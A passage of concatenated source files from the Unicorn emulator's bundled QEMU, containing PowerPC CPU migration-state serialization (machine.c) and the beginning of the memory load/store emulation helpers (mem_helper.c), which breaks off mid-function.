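 * the !CONFIG_KVM branch provides static inline fallbacks: capability
 * checks compile unconditionally, with no #ifdef at the call site.
 */
#if 0 /* illustration only */
static void mmu_setup_example(PowerPCCPU *cpu)
{
    if (kvmppc_has_cap_mmu_radix()) {
        /* KVM host supports radix; without CONFIG_KVM the stub simply
         * returns false and the compiler discards this branch. */
    }
}
#endif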
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/machine.c�������������������������������������������������������������0000664�0000000�0000000�00000057675�14675241067�0020017�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#if 0 #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "helper_regs.h" #include "mmu-hash64.h" #include "kvm_ppc.h" #include "exec/helper-proto.h" static int cpu_load_old(QEMUFile *f, void *opaque, int version_id) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; unsigned int i, j; target_ulong sdr1; uint32_t fpscr, vscr; #if defined(TARGET_PPC64) int32_t slb_nr; #endif target_ulong xer; for (i = 0; i < 32; i++) { qemu_get_betls(f, &env->gpr[i]); } #if !defined(TARGET_PPC64) for (i = 0; i < 32; i++) { qemu_get_betls(f, &env->gprh[i]); } #endif qemu_get_betls(f, &env->lr); qemu_get_betls(f, &env->ctr); for (i = 0; i < 8; i++) { qemu_get_be32s(f, &env->crf[i]); } qemu_get_betls(f, &xer); cpu_write_xer(env, xer); qemu_get_betls(f, &env->reserve_addr); qemu_get_betls(f, &env->msr); for (i = 0; i < 4; i++) { qemu_get_betls(f, &env->tgpr[i]); } for (i = 0; i < 32; i++) { union { float64 d; uint64_t l; } u; u.l = qemu_get_be64(f); *cpu_fpr_ptr(env, i) = u.d; } qemu_get_be32s(f, &fpscr); env->fpscr = fpscr; qemu_get_sbe32s(f, &env->access_type); #if defined(TARGET_PPC64) qemu_get_betls(f, &env->spr[SPR_ASR]); qemu_get_sbe32s(f, &slb_nr); #endif qemu_get_betls(f, &sdr1); for (i = 0; i < 32; i++) { qemu_get_betls(f, &env->sr[i]); } for (i = 0; i < 2; i++) { for (j = 0; j < 8; j++) { qemu_get_betls(f, &env->DBAT[i][j]); } } for (i = 0; i < 2; i++) { for (j = 0; j < 8; j++) { qemu_get_betls(f, &env->IBAT[i][j]); } } qemu_get_sbe32s(f, &env->nb_tlb); qemu_get_sbe32s(f, &env->tlb_per_way); qemu_get_sbe32s(f, &env->nb_ways); qemu_get_sbe32s(f, &env->last_way); qemu_get_sbe32s(f, &env->id_tlbs); qemu_get_sbe32s(f, &env->nb_pids); if (env->tlb.tlb6) { /* XXX assumes 6xx */ for (i = 0; i < env->nb_tlb; i++) { qemu_get_betls(f, &env->tlb.tlb6[i].pte0); qemu_get_betls(f, &env->tlb.tlb6[i].pte1); qemu_get_betls(f, &env->tlb.tlb6[i].EPN); } } for (i = 0; i < 4; i++) { qemu_get_betls(f, &env->pb[i]); } for (i = 0; i < 1024; i++) { qemu_get_betls(f, &env->spr[i]); } if (!cpu->vhyp) { ppc_store_sdr1(env, sdr1); } qemu_get_be32s(f, &vscr); helper_mtvscr(env, vscr); qemu_get_be64s(f, &env->spe_acc); qemu_get_be32s(f, &env->spe_fscr); qemu_get_betls(f, &env->msr_mask); qemu_get_be32s(f, &env->flags); qemu_get_sbe32s(f, &env->error_code); qemu_get_be32s(f, &env->pending_interrupts); qemu_get_be32s(f, &env->irq_input_state); for (i = 0; i < POWERPC_EXCP_NB; i++) { qemu_get_betls(f, &env->excp_vectors[i]); } qemu_get_betls(f, &env->excp_prefix); qemu_get_betls(f, &env->ivor_mask); qemu_get_betls(f, &env->ivpr_mask); qemu_get_betls(f, 
&env->hreset_vector); qemu_get_betls(f, &env->nip); qemu_get_betls(f, &env->hflags); qemu_get_betls(f, &env->hflags_nmsr); qemu_get_sbe32(f); /* Discard unused mmu_idx */ qemu_get_sbe32(f); /* Discard unused power_mode */ /* Recompute mmu indices */ hreg_compute_mem_idx(env); return 0; } static int get_avr(QEMUFile *f, void *pv, size_t size, const VMStateField *field) { ppc_avr_t *v = pv; v->u64[0] = qemu_get_be64(f); v->u64[1] = qemu_get_be64(f); return 0; } static int put_avr(QEMUFile *f, void *pv, size_t size, const VMStateField *field, QJSON *vmdesc) { ppc_avr_t *v = pv; qemu_put_be64(f, v->u64[0]); qemu_put_be64(f, v->u64[1]); return 0; } static const VMStateInfo vmstate_info_avr = { .name = "avr", .get = get_avr, .put = put_avr, }; #define VMSTATE_AVR_ARRAY_V(_f, _s, _n, _v) \ VMSTATE_SUB_ARRAY(_f, _s, 32, _n, _v, vmstate_info_avr, ppc_avr_t) #define VMSTATE_AVR_ARRAY(_f, _s, _n) \ VMSTATE_AVR_ARRAY_V(_f, _s, _n, 0) static int get_fpr(QEMUFile *f, void *pv, size_t size, const VMStateField *field) { ppc_vsr_t *v = pv; v->VsrD(0) = qemu_get_be64(f); return 0; } static int put_fpr(QEMUFile *f, void *pv, size_t size, const VMStateField *field, QJSON *vmdesc) { ppc_vsr_t *v = pv; qemu_put_be64(f, v->VsrD(0)); return 0; } static const VMStateInfo vmstate_info_fpr = { .name = "fpr", .get = get_fpr, .put = put_fpr, }; #define VMSTATE_FPR_ARRAY_V(_f, _s, _n, _v) \ VMSTATE_SUB_ARRAY(_f, _s, 0, _n, _v, vmstate_info_fpr, ppc_vsr_t) #define VMSTATE_FPR_ARRAY(_f, _s, _n) \ VMSTATE_FPR_ARRAY_V(_f, _s, _n, 0) static int get_vsr(QEMUFile *f, void *pv, size_t size, const VMStateField *field) { ppc_vsr_t *v = pv; v->VsrD(1) = qemu_get_be64(f); return 0; } static int put_vsr(QEMUFile *f, void *pv, size_t size, const VMStateField *field, QJSON *vmdesc) { ppc_vsr_t *v = pv; qemu_put_be64(f, v->VsrD(1)); return 0; } static const VMStateInfo vmstate_info_vsr = { .name = "vsr", .get = get_vsr, .put = put_vsr, }; #define VMSTATE_VSR_ARRAY_V(_f, _s, _n, _v) \ VMSTATE_SUB_ARRAY(_f, _s, 0, _n, _v, vmstate_info_vsr, ppc_vsr_t) #define VMSTATE_VSR_ARRAY(_f, _s, _n) \ VMSTATE_VSR_ARRAY_V(_f, _s, _n, 0) static bool cpu_pre_2_8_migration(void *opaque, int version_id) { PowerPCCPU *cpu = opaque; return cpu->pre_2_8_migration; } #if defined(TARGET_PPC64) static bool cpu_pre_3_0_migration(void *opaque, int version_id) { PowerPCCPU *cpu = opaque; return cpu->pre_3_0_migration; } #endif static int cpu_pre_save(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int i; uint64_t insns_compat_mask = PPC_INSNS_BASE | PPC_ISEL | PPC_STRING | PPC_MFTB | PPC_FLOAT | PPC_FLOAT_FSEL | PPC_FLOAT_FRES | PPC_FLOAT_FSQRT | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FRSQRTES | PPC_FLOAT_STFIWX | PPC_FLOAT_EXT | PPC_CACHE | PPC_CACHE_ICBI | PPC_CACHE_DCBZ | PPC_MEM_SYNC | PPC_MEM_EIEIO | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC | PPC_64B | PPC_64BX | PPC_ALTIVEC | PPC_SEGMENT_64B | PPC_SLBI | PPC_POPCNTB | PPC_POPCNTWD; uint64_t insns_compat_mask2 = PPC2_VSX | PPC2_VSX207 | PPC2_DFP | PPC2_DBRX | PPC2_PERM_ISA206 | PPC2_DIVE_ISA206 | PPC2_ATOMIC_ISA206 | PPC2_FP_CVT_ISA206 | PPC2_FP_TST_ISA206 | PPC2_BCTAR_ISA207 | PPC2_LSQ_ISA207 | PPC2_ALTIVEC_207 | PPC2_ISA205 | PPC2_ISA207S | PPC2_FP_CVT_S64 | PPC2_TM; env->spr[SPR_LR] = env->lr; env->spr[SPR_CTR] = env->ctr; env->spr[SPR_XER] = cpu_read_xer(env); #if defined(TARGET_PPC64) env->spr[SPR_CFAR] = env->cfar; #endif env->spr[SPR_BOOKE_SPEFSCR] = env->spe_fscr; for (i = 0; (i < 4) && (i < env->nb_BATs); i++) { env->spr[SPR_DBAT0U + 2 * i] = env->DBAT[0][i]; env->spr[SPR_DBAT0U + 2 * i + 1] 
= env->DBAT[1][i]; env->spr[SPR_IBAT0U + 2 * i] = env->IBAT[0][i]; env->spr[SPR_IBAT0U + 2 * i + 1] = env->IBAT[1][i]; } for (i = 0; (i < 4) && ((i + 4) < env->nb_BATs); i++) { env->spr[SPR_DBAT4U + 2 * i] = env->DBAT[0][i + 4]; env->spr[SPR_DBAT4U + 2 * i + 1] = env->DBAT[1][i + 4]; env->spr[SPR_IBAT4U + 2 * i] = env->IBAT[0][i + 4]; env->spr[SPR_IBAT4U + 2 * i + 1] = env->IBAT[1][i + 4]; } /* Hacks for migration compatibility between 2.6, 2.7 & 2.8 */ if (cpu->pre_2_8_migration) { /* * Mask out bits that got added to msr_mask since the versions * which stupidly included it in the migration stream. */ target_ulong metamask = 0 #if defined(TARGET_PPC64) | (1ULL << MSR_TS0) | (1ULL << MSR_TS1) #endif ; cpu->mig_msr_mask = env->msr_mask & ~metamask; cpu->mig_insns_flags = env->insns_flags & insns_compat_mask; /* * CPU models supported by old machines all have * PPC_MEM_TLBIE, so we set it unconditionally to allow * backward migration from a POWER9 host to a POWER8 host. */ cpu->mig_insns_flags |= PPC_MEM_TLBIE; cpu->mig_insns_flags2 = env->insns_flags2 & insns_compat_mask2; cpu->mig_nb_BATs = env->nb_BATs; } if (cpu->pre_3_0_migration) { if (cpu->hash64_opts) { cpu->mig_slb_nr = cpu->hash64_opts->slb_size; } } return 0; } /* * Determine if a given PVR is a "close enough" match to the CPU * object. For TCG and KVM PR it would probably be sufficient to * require an exact PVR match. However for KVM HV the user is * restricted to a PVR exactly matching the host CPU. The correct way * to handle this is to put the guest into an architected * compatibility mode. However, to allow a more forgiving transition * and migration from before this was widely done, we allow migration * between sufficiently similar PVRs, as determined by the CPU class's * pvr_match() hook. */ static bool pvr_match(PowerPCCPU *cpu, uint32_t pvr) { PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); if (pvr == pcc->pvr) { return true; } return pcc->pvr_match(pcc, pvr); } static int cpu_post_load(void *opaque, int version_id) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int i; target_ulong msr; /* * If we're operating in compat mode, we should be ok as long as * the destination supports the same compatiblity mode. * * Otherwise, however, we require that the destination has exactly * the same CPU model as the source. */ #if defined(TARGET_PPC64) if (cpu->compat_pvr) { uint32_t compat_pvr = cpu->compat_pvr; Error *local_err = NULL; cpu->compat_pvr = 0; ppc_set_compat(cpu, compat_pvr, &local_err); if (local_err) { error_report_err(local_err); return -1; } } else #endif { if (!pvr_match(cpu, env->spr[SPR_PVR])) { return -1; } } /* * If we're running with KVM HV, there is a chance that the guest * is running with KVM HV and its kernel does not have the * capability of dealing with a different PVR other than this * exact host PVR in KVM_SET_SREGS. If that happens, the * guest freezes after migration. * * The function kvmppc_pvr_workaround_required does this verification * by first checking if the kernel has the cap, returning true immediately * if that is the case. Otherwise, it checks if we're running in KVM PR. * If the guest kernel does not have the cap and we're not running KVM-PR * (so, it is running KVM-HV), we need to ensure that KVM_SET_SREGS will * receive the PVR it expects as a workaround. 
* */ if (kvmppc_pvr_workaround_required(cpu)) { env->spr[SPR_PVR] = env->spr_cb[SPR_PVR].default_value; } env->lr = env->spr[SPR_LR]; env->ctr = env->spr[SPR_CTR]; cpu_write_xer(env, env->spr[SPR_XER]); #if defined(TARGET_PPC64) env->cfar = env->spr[SPR_CFAR]; #endif env->spe_fscr = env->spr[SPR_BOOKE_SPEFSCR]; for (i = 0; (i < 4) && (i < env->nb_BATs); i++) { env->DBAT[0][i] = env->spr[SPR_DBAT0U + 2 * i]; env->DBAT[1][i] = env->spr[SPR_DBAT0U + 2 * i + 1]; env->IBAT[0][i] = env->spr[SPR_IBAT0U + 2 * i]; env->IBAT[1][i] = env->spr[SPR_IBAT0U + 2 * i + 1]; } for (i = 0; (i < 4) && ((i + 4) < env->nb_BATs); i++) { env->DBAT[0][i + 4] = env->spr[SPR_DBAT4U + 2 * i]; env->DBAT[1][i + 4] = env->spr[SPR_DBAT4U + 2 * i + 1]; env->IBAT[0][i + 4] = env->spr[SPR_IBAT4U + 2 * i]; env->IBAT[1][i + 4] = env->spr[SPR_IBAT4U + 2 * i + 1]; } if (!cpu->vhyp) { ppc_store_sdr1(env, env->spr[SPR_SDR1]); } /* * Invalidate all supported msr bits except MSR_TGPR/MSR_HVB * before restoring */ msr = env->msr; env->msr ^= env->msr_mask & ~((1ULL << MSR_TGPR) | MSR_HVB); ppc_store_msr(env, msr); hreg_compute_mem_idx(env); return 0; } static bool fpu_needed(void *opaque) { PowerPCCPU *cpu = opaque; return cpu->env.insns_flags & PPC_FLOAT; } static const VMStateDescription vmstate_fpu = { .name = "cpu/fpu", .version_id = 1, .minimum_version_id = 1, .needed = fpu_needed, .fields = (VMStateField[]) { VMSTATE_FPR_ARRAY(env.vsr, PowerPCCPU, 32), VMSTATE_UINTTL(env.fpscr, PowerPCCPU), VMSTATE_END_OF_LIST() }, }; static bool altivec_needed(void *opaque) { PowerPCCPU *cpu = opaque; return cpu->env.insns_flags & PPC_ALTIVEC; } static int get_vscr(QEMUFile *f, void *opaque, size_t size, const VMStateField *field) { PowerPCCPU *cpu = opaque; helper_mtvscr(&cpu->env, qemu_get_be32(f)); return 0; } static int put_vscr(QEMUFile *f, void *opaque, size_t size, const VMStateField *field, QJSON *vmdesc) { PowerPCCPU *cpu = opaque; qemu_put_be32(f, helper_mfvscr(&cpu->env)); return 0; } static const VMStateInfo vmstate_vscr = { .name = "cpu/altivec/vscr", .get = get_vscr, .put = put_vscr, }; static const VMStateDescription vmstate_altivec = { .name = "cpu/altivec", .version_id = 1, .minimum_version_id = 1, .needed = altivec_needed, .fields = (VMStateField[]) { VMSTATE_AVR_ARRAY(env.vsr, PowerPCCPU, 32), /* * Save the architecture value of the vscr, not the internally * expanded version. Since this architecture value does not * exist in memory to be stored, this requires a but of hoop * jumping. We want OFFSET=0 so that we effectively pass CPU * to the helper functions. 
*/ { .name = "vscr", .version_id = 0, .size = sizeof(uint32_t), .info = &vmstate_vscr, .flags = VMS_SINGLE, .offset = 0 }, VMSTATE_END_OF_LIST() }, }; static bool vsx_needed(void *opaque) { PowerPCCPU *cpu = opaque; return cpu->env.insns_flags2 & PPC2_VSX; } static const VMStateDescription vmstate_vsx = { .name = "cpu/vsx", .version_id = 1, .minimum_version_id = 1, .needed = vsx_needed, .fields = (VMStateField[]) { VMSTATE_VSR_ARRAY(env.vsr, PowerPCCPU, 32), VMSTATE_END_OF_LIST() }, }; #ifdef TARGET_PPC64 /* Transactional memory state */ static bool tm_needed(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; return msr_ts; } static const VMStateDescription vmstate_tm = { .name = "cpu/tm", .version_id = 1, .minimum_version_id = 1, .minimum_version_id_old = 1, .needed = tm_needed, .fields = (VMStateField []) { VMSTATE_UINTTL_ARRAY(env.tm_gpr, PowerPCCPU, 32), VMSTATE_AVR_ARRAY(env.tm_vsr, PowerPCCPU, 64), VMSTATE_UINT64(env.tm_cr, PowerPCCPU), VMSTATE_UINT64(env.tm_lr, PowerPCCPU), VMSTATE_UINT64(env.tm_ctr, PowerPCCPU), VMSTATE_UINT64(env.tm_fpscr, PowerPCCPU), VMSTATE_UINT64(env.tm_amr, PowerPCCPU), VMSTATE_UINT64(env.tm_ppr, PowerPCCPU), VMSTATE_UINT64(env.tm_vrsave, PowerPCCPU), VMSTATE_UINT32(env.tm_vscr, PowerPCCPU), VMSTATE_UINT64(env.tm_dscr, PowerPCCPU), VMSTATE_UINT64(env.tm_tar, PowerPCCPU), VMSTATE_END_OF_LIST() }, }; #endif static bool sr_needed(void *opaque) { #ifdef TARGET_PPC64 PowerPCCPU *cpu = opaque; return !(cpu->env.mmu_model & POWERPC_MMU_64); #else return true; #endif } static const VMStateDescription vmstate_sr = { .name = "cpu/sr", .version_id = 1, .minimum_version_id = 1, .needed = sr_needed, .fields = (VMStateField[]) { VMSTATE_UINTTL_ARRAY(env.sr, PowerPCCPU, 32), VMSTATE_END_OF_LIST() }, }; #ifdef TARGET_PPC64 static int get_slbe(QEMUFile *f, void *pv, size_t size, const VMStateField *field) { ppc_slb_t *v = pv; v->esid = qemu_get_be64(f); v->vsid = qemu_get_be64(f); return 0; } static int put_slbe(QEMUFile *f, void *pv, size_t size, const VMStateField *field, QJSON *vmdesc) { ppc_slb_t *v = pv; qemu_put_be64(f, v->esid); qemu_put_be64(f, v->vsid); return 0; } static const VMStateInfo vmstate_info_slbe = { .name = "slbe", .get = get_slbe, .put = put_slbe, }; #define VMSTATE_SLB_ARRAY_V(_f, _s, _n, _v) \ VMSTATE_ARRAY(_f, _s, _n, _v, vmstate_info_slbe, ppc_slb_t) #define VMSTATE_SLB_ARRAY(_f, _s, _n) \ VMSTATE_SLB_ARRAY_V(_f, _s, _n, 0) static bool slb_needed(void *opaque) { PowerPCCPU *cpu = opaque; /* We don't support any of the old segment table based 64-bit CPUs */ return cpu->env.mmu_model & POWERPC_MMU_64; } static int slb_post_load(void *opaque, int version_id) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; int i; /* * We've pulled in the raw esid and vsid values from the migration * stream, but we need to recompute the page size pointers */ for (i = 0; i < cpu->hash64_opts->slb_size; i++) { if (ppc_store_slb(cpu, i, env->slb[i].esid, env->slb[i].vsid) < 0) { /* Migration source had bad values in its SLB */ return -1; } } return 0; } static const VMStateDescription vmstate_slb = { .name = "cpu/slb", .version_id = 1, .minimum_version_id = 1, .needed = slb_needed, .post_load = slb_post_load, .fields = (VMStateField[]) { VMSTATE_INT32_TEST(mig_slb_nr, PowerPCCPU, cpu_pre_3_0_migration), VMSTATE_SLB_ARRAY(env.slb, PowerPCCPU, MAX_SLB_ENTRIES), VMSTATE_END_OF_LIST() } }; #endif /* TARGET_PPC64 */ static const VMStateDescription vmstate_tlb6xx_entry = { .name = "cpu/tlb6xx_entry", .version_id = 1, .minimum_version_id = 1, .fields 
= (VMStateField[]) { VMSTATE_UINTTL(pte0, ppc6xx_tlb_t), VMSTATE_UINTTL(pte1, ppc6xx_tlb_t), VMSTATE_UINTTL(EPN, ppc6xx_tlb_t), VMSTATE_END_OF_LIST() }, }; static bool tlb6xx_needed(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; return env->nb_tlb && (env->tlb_type == TLB_6XX); } static const VMStateDescription vmstate_tlb6xx = { .name = "cpu/tlb6xx", .version_id = 1, .minimum_version_id = 1, .needed = tlb6xx_needed, .fields = (VMStateField[]) { VMSTATE_INT32_EQUAL(env.nb_tlb, PowerPCCPU, NULL), VMSTATE_STRUCT_VARRAY_POINTER_INT32(env.tlb.tlb6, PowerPCCPU, env.nb_tlb, vmstate_tlb6xx_entry, ppc6xx_tlb_t), VMSTATE_UINTTL_ARRAY(env.tgpr, PowerPCCPU, 4), VMSTATE_END_OF_LIST() } }; static const VMStateDescription vmstate_tlbemb_entry = { .name = "cpu/tlbemb_entry", .version_id = 1, .minimum_version_id = 1, .fields = (VMStateField[]) { VMSTATE_UINT64(RPN, ppcemb_tlb_t), VMSTATE_UINTTL(EPN, ppcemb_tlb_t), VMSTATE_UINTTL(PID, ppcemb_tlb_t), VMSTATE_UINTTL(size, ppcemb_tlb_t), VMSTATE_UINT32(prot, ppcemb_tlb_t), VMSTATE_UINT32(attr, ppcemb_tlb_t), VMSTATE_END_OF_LIST() }, }; static bool tlbemb_needed(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; return env->nb_tlb && (env->tlb_type == TLB_EMB); } static bool pbr403_needed(void *opaque) { PowerPCCPU *cpu = opaque; uint32_t pvr = cpu->env.spr[SPR_PVR]; return (pvr & 0xffff0000) == 0x00200000; } static const VMStateDescription vmstate_pbr403 = { .name = "cpu/pbr403", .version_id = 1, .minimum_version_id = 1, .needed = pbr403_needed, .fields = (VMStateField[]) { VMSTATE_UINTTL_ARRAY(env.pb, PowerPCCPU, 4), VMSTATE_END_OF_LIST() }, }; static const VMStateDescription vmstate_tlbemb = { .name = "cpu/tlb6xx", .version_id = 1, .minimum_version_id = 1, .needed = tlbemb_needed, .fields = (VMStateField[]) { VMSTATE_INT32_EQUAL(env.nb_tlb, PowerPCCPU, NULL), VMSTATE_STRUCT_VARRAY_POINTER_INT32(env.tlb.tlbe, PowerPCCPU, env.nb_tlb, vmstate_tlbemb_entry, ppcemb_tlb_t), /* 403 protection registers */ VMSTATE_END_OF_LIST() }, .subsections = (const VMStateDescription*[]) { &vmstate_pbr403, NULL } }; static const VMStateDescription vmstate_tlbmas_entry = { .name = "cpu/tlbmas_entry", .version_id = 1, .minimum_version_id = 1, .fields = (VMStateField[]) { VMSTATE_UINT32(mas8, ppcmas_tlb_t), VMSTATE_UINT32(mas1, ppcmas_tlb_t), VMSTATE_UINT64(mas2, ppcmas_tlb_t), VMSTATE_UINT64(mas7_3, ppcmas_tlb_t), VMSTATE_END_OF_LIST() }, }; static bool tlbmas_needed(void *opaque) { PowerPCCPU *cpu = opaque; CPUPPCState *env = &cpu->env; return env->nb_tlb && (env->tlb_type == TLB_MAS); } static const VMStateDescription vmstate_tlbmas = { .name = "cpu/tlbmas", .version_id = 1, .minimum_version_id = 1, .needed = tlbmas_needed, .fields = (VMStateField[]) { VMSTATE_INT32_EQUAL(env.nb_tlb, PowerPCCPU, NULL), VMSTATE_STRUCT_VARRAY_POINTER_INT32(env.tlb.tlbm, PowerPCCPU, env.nb_tlb, vmstate_tlbmas_entry, ppcmas_tlb_t), VMSTATE_END_OF_LIST() } }; static bool compat_needed(void *opaque) { PowerPCCPU *cpu = opaque; assert(!(cpu->compat_pvr && !cpu->vhyp)); return !cpu->pre_2_10_migration && cpu->compat_pvr != 0; } static const VMStateDescription vmstate_compat = { .name = "cpu/compat", .version_id = 1, .minimum_version_id = 1, .needed = compat_needed, .fields = (VMStateField[]) { VMSTATE_UINT32(compat_pvr, PowerPCCPU), VMSTATE_END_OF_LIST() } }; const VMStateDescription vmstate_ppc_cpu = { .name = "cpu", .version_id = 5, .minimum_version_id = 5, .minimum_version_id_old = 4, .load_state_old = cpu_load_old, .pre_save = cpu_pre_save, .post_load = 
cpu_post_load,
    .fields = (VMStateField[]) {
        VMSTATE_UNUSED(sizeof(target_ulong)), /* was _EQUAL(env.spr[SPR_PVR]) */

        /* User mode architected state */
        VMSTATE_UINTTL_ARRAY(env.gpr, PowerPCCPU, 32),
#if !defined(TARGET_PPC64)
        VMSTATE_UINTTL_ARRAY(env.gprh, PowerPCCPU, 32),
#endif
        VMSTATE_UINT32_ARRAY(env.crf, PowerPCCPU, 8),
        VMSTATE_UINTTL(env.nip, PowerPCCPU),

        /* SPRs */
        VMSTATE_UINTTL_ARRAY(env.spr, PowerPCCPU, 1024),
        VMSTATE_UINT64(env.spe_acc, PowerPCCPU),

        /* Reservation */
        VMSTATE_UINTTL(env.reserve_addr, PowerPCCPU),

        /* Supervisor mode architected state */
        VMSTATE_UINTTL(env.msr, PowerPCCPU),

        /* Internal state */
        VMSTATE_UINTTL(env.hflags_nmsr, PowerPCCPU),
        /* FIXME: access_type? */

        /* Sanity checking */
        VMSTATE_UINTTL_TEST(mig_msr_mask, PowerPCCPU, cpu_pre_2_8_migration),
        VMSTATE_UINT64_TEST(mig_insns_flags, PowerPCCPU, cpu_pre_2_8_migration),
        VMSTATE_UINT64_TEST(mig_insns_flags2, PowerPCCPU,
                            cpu_pre_2_8_migration),
        VMSTATE_UINT32_TEST(mig_nb_BATs, PowerPCCPU, cpu_pre_2_8_migration),
        VMSTATE_END_OF_LIST()
    },
    .subsections = (const VMStateDescription*[]) {
        &vmstate_fpu,
        &vmstate_altivec,
        &vmstate_vsx,
        &vmstate_sr,
#ifdef TARGET_PPC64
        &vmstate_tm,
        &vmstate_slb,
#endif /* TARGET_PPC64 */
        &vmstate_tlb6xx,
        &vmstate_tlbemb,
        &vmstate_tlbmas,
        &vmstate_compat,
        NULL
    }
};
#endif

unicorn-2.1.1/qemu/target/ppc/mem_helper.c

/*
 * PowerPC memory access emulation helpers for QEMU.
 *
 * Copyright (c) 2003-2007 Jocelyn Mayer
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "helper_regs.h" #include "exec/cpu_ldst.h" #include "tcg/tcg.h" #include "internal.h" #include "qemu/atomic128.h" /* #define DEBUG_OP */ static inline bool needs_byteswap(const CPUPPCState *env) { #if defined(TARGET_WORDS_BIGENDIAN) return msr_le; #else return !msr_le; #endif } /*****************************************************************************/ /* Memory load and stores */ static inline target_ulong addr_add(CPUPPCState *env, target_ulong addr, target_long arg) { #if defined(TARGET_PPC64) if (!msr_is_64bit(env, env->msr)) { return (uint32_t)(addr + arg); } else #endif { return addr + arg; } } static void *probe_contiguous(CPUPPCState *env, target_ulong addr, uint32_t nb, MMUAccessType access_type, int mmu_idx, uintptr_t raddr) { char *host1, *host2; uint32_t nb_pg1, nb_pg2; #ifdef _MSC_VER nb_pg1 = 0 - (addr | TARGET_PAGE_MASK); #else nb_pg1 = -(addr | TARGET_PAGE_MASK); #endif if (likely(nb <= nb_pg1)) { /* The entire operation is on a single page. */ return probe_access(env, addr, nb, access_type, mmu_idx, raddr); } /* The operation spans two pages. */ nb_pg2 = nb - nb_pg1; host1 = probe_access(env, addr, nb_pg1, access_type, mmu_idx, raddr); addr = addr_add(env, addr, nb_pg1); host2 = probe_access(env, addr, nb_pg2, access_type, mmu_idx, raddr); /* If the two host pages are contiguous, optimize. */ if (host2 == host1 + nb_pg1) { return host1; } return NULL; } void helper_lmw(CPUPPCState *env, target_ulong addr, uint32_t reg) { uintptr_t raddr = GETPC(); int mmu_idx = cpu_mmu_index(env, false); char *host = probe_contiguous(env, addr, (32 - reg) * 4, MMU_DATA_LOAD, mmu_idx, raddr); if (likely(host)) { /* Fast path -- the entire operation is in RAM at host. */ for (; reg < 32; reg++) { env->gpr[reg] = (uint32_t)ldl_be_p(host); host += 4; } } else { /* Slow path -- at least some of the operation requires i/o. */ for (; reg < 32; reg++) { env->gpr[reg] = cpu_ldl_mmuidx_ra(env, addr, mmu_idx, raddr); addr = addr_add(env, addr, 4); } } } void helper_stmw(CPUPPCState *env, target_ulong addr, uint32_t reg) { uintptr_t raddr = GETPC(); int mmu_idx = cpu_mmu_index(env, false); char *host = probe_contiguous(env, addr, (32 - reg) * 4, MMU_DATA_STORE, mmu_idx, raddr); if (likely(host)) { /* Fast path -- the entire operation is in RAM at host. */ for (; reg < 32; reg++) { stl_be_p(host, env->gpr[reg]); host += 4; } } else { /* Slow path -- at least some of the operation requires i/o. */ for (; reg < 32; reg++) { cpu_stl_mmuidx_ra(env, addr, env->gpr[reg], mmu_idx, raddr); addr = addr_add(env, addr, 4); } } } static void do_lsw(CPUPPCState *env, target_ulong addr, uint32_t nb, uint32_t reg, uintptr_t raddr) { int mmu_idx; char *host; uint32_t val; if (unlikely(nb == 0)) { return; } mmu_idx = cpu_mmu_index(env, false); host = probe_contiguous(env, addr, nb, MMU_DATA_LOAD, mmu_idx, raddr); if (likely(host)) { /* Fast path -- the entire operation is in RAM at host. */ for (; nb > 3; nb -= 4) { env->gpr[reg] = (uint32_t)ldl_be_p(host); reg = (reg + 1) % 32; host += 4; } switch (nb) { default: return; case 1: val = ldub_p(host) << 24; break; case 2: val = lduw_be_p(host) << 16; break; case 3: val = (lduw_be_p(host) << 16) | (ldub_p(host + 2) << 8); break; } } else { /* Slow path -- at least some of the operation requires i/o. 
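 * (probe_contiguous() returned NULL: the range spans host pages that
 * are not contiguous, or touches something that is not plain RAM, so
 * fall back to per-access MMU translation.)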
*/ for (; nb > 3; nb -= 4) { env->gpr[reg] = cpu_ldl_mmuidx_ra(env, addr, mmu_idx, raddr); reg = (reg + 1) % 32; addr = addr_add(env, addr, 4); } switch (nb) { default: return; case 1: val = cpu_ldub_mmuidx_ra(env, addr, mmu_idx, raddr) << 24; break; case 2: val = cpu_lduw_mmuidx_ra(env, addr, mmu_idx, raddr) << 16; break; case 3: val = cpu_lduw_mmuidx_ra(env, addr, mmu_idx, raddr) << 16; addr = addr_add(env, addr, 2); val |= cpu_ldub_mmuidx_ra(env, addr, mmu_idx, raddr) << 8; break; } } env->gpr[reg] = val; } void helper_lsw(CPUPPCState *env, target_ulong addr, uint32_t nb, uint32_t reg) { do_lsw(env, addr, nb, reg, GETPC()); } /* * PPC32 specification says we must generate an exception if rA is in * the range of registers to be loaded. In an other hand, IBM says * this is valid, but rA won't be loaded. For now, I'll follow the * spec... */ void helper_lswx(CPUPPCState *env, target_ulong addr, uint32_t reg, uint32_t ra, uint32_t rb) { if (likely(xer_bc != 0)) { int num_used_regs = DIV_ROUND_UP(xer_bc, 4); if (unlikely((ra != 0 && lsw_reg_in_range(reg, num_used_regs, ra)) || lsw_reg_in_range(reg, num_used_regs, rb))) { raise_exception_err_ra(env, 